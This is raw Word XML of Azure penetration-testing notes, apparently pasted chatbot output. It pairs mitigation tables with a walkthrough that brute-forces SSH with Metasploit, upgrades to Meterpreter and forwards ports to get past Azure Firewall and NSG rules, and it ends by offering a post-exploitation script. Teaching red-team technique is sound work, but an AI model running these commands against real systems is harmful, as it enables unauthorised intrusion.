          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mitigation in Azure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5153"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="714EC962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77D71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38640CE0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Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="3E570D80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B6E6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NSG Rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28C590F7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Block unused ports, never expose 8080 externally</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="0D3B18AC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C310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Just-In-Time Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2121154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Use Azure Defender JIT to restrict SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="5585D965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2EF7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19CC8137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Use WAF with host header rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="130A697E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DD4C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VNet Peering/Endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BC36BC5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Avoid public routing for internal services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="4ACEAC01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C33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0B7EB68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Enable Azure Monitor logs and audit SSH/Apache logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75A9772E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505164C2">
          <v:rect id="_x0000_i1173" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="014E113B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🧷</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US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882"/>
        <w:gridCol w:w="2604"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="74142AE0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7BF1B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D6B2AE6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59B8D3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Tool/Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="30A66455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C45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Port Forwarding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F2320B1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Reach internal services via NAT/tunnel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41A9F846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ssh -L 8080:10.0.0.5:80 ...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="0A61F508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CE9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lastRenderedPageBreak/>
              <w:t>Tunneling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61FA7703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Secure traffic across network barriers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60B4926B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SSH, Autossh, Proxytunnel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="62012B3E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E56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Virtual Host Abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42CBAFA3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Discover hidden web apps on same host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B1DD1AA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ffuf, curl -H "Host: ..." ...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61E4C41C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5D935392">
          <v:rect id="_x0000_i1174" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2044572A" w14:textId="77777777" w:rsidR="00D701C1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Would you like a full </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>automated tunneling and virtual host discovery script</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to include in your Azure post-exploitation toolkit?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D0BCCC" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AE7D671" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B1AA277" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc226381649"/>
      <w:r w:rsidRPr="00907CF2">
        <w:t>Port Forwarding in Hub-Spoke &amp; DMZ Scenarios</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="37D77AFC" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6095E186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Here's a </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>corrected, expanded, and Azure-specific rewrite</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the topic “</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Port Forwarding in the Context of Azure Penetration Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">,” focusing specifically on environments that include </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Hub-Spoke VNET architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>DMZ subnet segmentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>. It walks through the steps in detail and aligns them with how real-world attackers or red teamers might move through an Azure cloud network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F9B28F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77F9F3DC">
          <v:rect id="_x0000_i1175" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="364412D5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🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure Penetration Testing: Port Forwarding in Hub-Spoke &amp; DMZ Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C934B05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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B1F041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Demonstrate how </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>port forwarding</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used in an Azure environment—specifically targeting </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>spoke VMs</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>DMZ services</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>private-only resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">—to pivot through a </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>compromised machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> behind Azure Firewall or in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Hub VNET</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5AEE1D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4B0D275F">
          <v:rect id="_x0000_i1176" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6DBC15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📚</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure Network Architecture Context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D53A89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In a typical </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Hub-Spoke topology with Azure Firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>, you have:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5033697E" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Hub VNET</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>: Centralized services (Azure Firewall, VPN Gateway, Bastion, DNS, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F62EACD" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Spoke VNETs</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>: Application workloads and VMs, isolated using NSGs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D6A71E" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>DMZ Subnet</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>: Exposes public-facing services via Azure Firewall or Load Balancer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D61245" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Restricted Internal Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>: Only accessible from the Hub or certain Bastion hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3087E252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🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Goal for Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68022400" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Pivot from a compromised </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>spoke VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>DMZ web server</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352C0764" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Access internal-only services (e.g., web app admin panels, databases).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752456AD" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Bypass Azure Firewall and NSG rules using </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>port forwarding</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>tunnels</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1E1267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52AC4971">
          <v:rect id="_x0000_i1177" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B4AE18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🧰</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tools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718"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="6C4B8751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79CCB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96FBEC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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="6C39DCF3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0E8F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2CA25F97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Attacking machine (outside Azure)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="11F63758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3FDB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Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2344657D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Session handling and portfwd control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="2BBD3EE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E7AA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SSH or Socat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36851D2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Manual tunnels</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D701C1" w:rsidRPr="00907CF2" w14:paraId="2AB4C20A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2CC5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Azure VM Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04D64229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Optional method to run RunCommand</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7384B460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368A5D67">
          <v:rect id="_x0000_i1178" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4508B04D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🛠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Port Forwarding via Metasploit (in Azure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79604353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💥</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 1: Gain Initial Foothold in a Spoke VNET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D03C0AF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Assume you've compromised a </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>low-privileged Linux VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside the Spoke VNET (e.g., via SSH brute-force or vulnerable web app).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1403EB65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use auxiliary/scanner/ssh/ssh_login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756A31DE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set RHOSTS 10.1.2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060809FD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set USERNAME azureuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D73D798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set PASSWORD Welcome123!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6022D442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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3335D380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🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 2: Upgrade to Meterpreter Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FFA214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sessions -u 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F9A52C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sessions 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B423C88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lastRenderedPageBreak/>
        <w:t>Verify internal open ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67192C68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netstat -antp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC98D7D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Example output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E45C9FB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tcp 0.0.0.0:8080 LISTEN nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2662664C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This suggests a </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>web service</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is running on port 8080 locally, not exposed publicly due to NSG or Azure Firewall rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FB295C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752DFABA">
          <v:rect id="_x0000_i1179" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="696E674A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🔁</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 3: Port Forward Internal Service to Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7D7CEA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 xml:space="preserve">Set up </w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>port forwarding</w:t>
      </w:r>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the attacker machine to the internal service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282E0097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portfwd add -l 8081 -p 8080 -r 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D963B2" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>-l 8081: Local port on Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D2580A" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>-p 8080: Remote port on victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55885032" w14:textId="77777777" w:rsidR="00D701C1" w:rsidRPr="00907CF2" w:rsidRDefault="00D701C1" w:rsidP="00D701C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907CF2">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>-r 127.0.0.1: Localhost of victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697982D3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Then from Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759CD1BC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curl http://127.0.0.1:8081</w:t>
      </w:r>
    </w:p>
